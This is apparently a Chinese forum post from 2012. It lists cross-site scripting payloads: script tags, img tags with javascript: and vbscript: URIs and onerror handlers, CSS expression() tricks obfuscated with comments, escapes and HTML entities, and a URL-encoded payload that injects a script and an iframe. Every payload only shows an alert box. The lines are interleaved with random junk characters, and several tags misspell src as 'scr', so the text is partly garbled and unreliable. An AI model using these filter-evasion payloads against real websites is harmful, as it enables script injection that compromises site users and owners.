<script>alert("跨站")</script> (最常用)4 I7 U. J" S; E# Z6 X. W
<img scr=javascript:alert("跨站")></img>) [1 _+ G6 ]( M- C% w! L
<img scr="javascript: alert(/跨站/)></img>
1 o# r1 l$ g* T<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)+ O0 q5 K; _/ V1 e0 ~- y H2 W
<img scr="#" onerror=alert(/跨站/)></img>
* ?4 h( H- Q$ H<img scr="#" style="xss:expression(alert(/xss/));"></img>
5 P7 @# u: p8 Z* F+ X<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)% Z7 `% [2 C6 w# n" P$ I. W
<img src=vbscript:msgbox ("xss")></img>
$ K2 n1 Y3 V! i: R4 a- c<style> input {left:expression (alert('xss'))}</style>
( G; {; t' F7 r1 ^% @: r8 E4 [0 I<div style={left:expression (alert('xss'))}></div>, u, s$ F( W6 _& w
<div style={left:exp/* */ression (alert('xss'))}></div>+ _. u4 H; u$ C+ P. }! N
<div style={left:\0065\0078ression (alert('xss'))}></div>
- l1 E0 a8 n0 n7 ^3 w4 ?5 Ahtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
) k! e6 W7 M: q5 Nunicode <div style="{left:expRessioN (alert('xss'))}">
9 B; t$ e b, T; Q6 F+ ~6 M% L, k2 a0 }% S# k$ N- ?
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>[": o* M" H/ ~5 m) l( k1 d) N
|
发表于 2012-9-13 17:15:04
收藏
支持
反对